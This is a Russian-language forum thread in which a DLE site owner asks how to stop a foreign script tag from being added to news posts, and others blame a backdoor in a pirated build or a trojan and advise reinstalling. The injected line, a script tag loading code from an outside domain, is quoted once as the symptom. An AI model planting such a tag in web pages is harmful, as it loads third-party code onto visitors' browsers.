[Вопрос] При добавлении новости добавляется код левого скрипта. Как это убрать ?

[efr07]

Я добавляю новость а когда допустим захожу её редактировать в полной и короткой новости добавляется строчка <script src="http://tvoyatajna.msk.ru/injs.820cee7448076a85c6b791f82a6adcfc/" type="text/javascript"></script> ! ъ

что делать ? как от этого избавиться ?

[Serberg]

efr07, самый простой способ - это взять нормальный движок DLE и поставить. Я уже кажется писал о прелестях говносборок и т.п. Некоторые особо умные личности писали что это круто и что там уже все собрано и делать ничего не надо )).

Я думаю что данный скрипт - это только одно из многих что ты нашел. Как на счет блэкдора и т.п. ? Мой совет - выбрасывай этот скрипт.

А если не хочешь то придется искать скрипт либо в базе, либо в файлах. Где точно сказать нельзя или можно спросить у автора сего детища.

[efr07]

efr07, самый простой способ - это взять нормальный движок DLE и поставить. Я уже кажется писал о прелестях говносборок и т.п. Некоторые особо умные личности писали что это круто и что там уже все собрано и делать ничего не надо )).

Я думаю что данный скрипт - это только одно из многих что ты нашел. Как на счет блэкдора и т.п. ? Мой совет - выбрасывай этот скрипт.

А если не хочешь то придется искать скрипт либо в базе, либо в файлах. Где точно сказать нельзя или можно спросить у автора сего детища.

так раньше такого не было ! только щас появилось !

[Serberg]

так раньше такого не было ! только щас появилось !

Тогда есть 2 варианта. Либо код был добавлен заранее, что мало вероятно, либо есть в движке блэкдур, через который могли зайти к тебе в гости и наградить такой гадостью. Я помню сборки от MID Team славились такими штучками.

Угадать на 100% откуда это взялось - нельзя, но дыра где то есть - это однозначно. У меня форум 2 раза турки взламывали, я репу чесал, думал как, перерыл немеренно инфы. А оказалось ломали через DLE, который лежал в соседней папке с форумом.

[Злой]

Не стоит исключать возможность присутствия на компе трояна, который добавляет во все POST запросы свои ссылочки ))
Винда форева!
Впервые обнаружил такое пару месяцев назад, когда одна юзерша одного из моих сайтов начала постить вполне приличные коментарии со ссылка на всякие какашечные сайты ))

[tanka1380]

Впервые обнаружил такое пару месяцев назад, когда одна юзерша одного из моих сайтов начала постить вполне приличные коментарии со ссылка на всякие какашечные сайты ))

У меня такое тоже было. Хостер помог избавиться. Торян влез через разрешенные жи-эсы в личке на треккере. А треккер в соседней папке на фтп.
--------------------------------------------------------------------
кстати. До сих пор есть остаточек от галеры, "Цезарь" называется. Никак не удалить из админки. Вроде и не мешает, а вот, что-то не совсем спокойно.

[cassper]

Оффтоп

серег, извини конечно и я не на твоем месте, но я бы запретил создавать и присекал темы с такими вот многообещающими и настолько информативными заголовками. Если уж и начинать тему, то в краткой форме определить проблему, которая решается. Да, этот оффтоп я оставляю на будущее для ТС (автора темы), чтобы взял на заметку и не лепил на скорую руку все. Спасибо.

[Stalker]

100-пудово троян, у меня тоже такое было. Перелопатил ручками весь код. На хосте всё снёс и заного залил чистый код.

ЗЫ: правда не в дле. В Дле много файлов задействованно для добавлеия новости. Ручками тяжело будет...